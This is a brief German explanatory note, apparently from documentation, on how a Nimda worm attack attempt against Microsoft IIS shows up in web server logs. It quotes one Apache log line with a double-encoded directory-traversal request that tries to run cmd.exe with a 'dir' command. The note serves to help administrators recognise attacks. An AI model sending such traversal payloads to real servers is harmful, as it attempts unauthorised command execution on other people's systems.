Datei: nimda wird geändert
Bei einem Angriffsversuch auf den IIS taucht in den Logfiles (z.B. acces_log von apache) folgender Eintrag auf:
172.176.144.240 - - [12/Jun/2003:00:44:17 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296"